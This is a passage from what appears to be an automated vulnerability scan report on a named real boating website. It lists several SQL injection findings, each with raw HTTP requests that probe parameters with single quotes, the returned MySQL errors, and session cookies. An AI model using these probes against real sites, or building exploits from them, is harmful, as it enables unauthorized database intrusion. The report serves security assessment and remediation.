P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/profiles?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.86. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/technical?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/technical?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.87. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/type-of-boat?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/type-of-boat?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.88. http://www.soundingsonline.com/index.php [Itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.89. http://www.soundingsonline.com/index.php [chronoformname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.90. http://www.soundingsonline.com/index.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.91. http://www.soundingsonline.com/index.php [layout parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.92. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.93. http://www.soundingsonline.com/index.php [option parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.94. http://www.soundingsonline.com/index.php [view parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
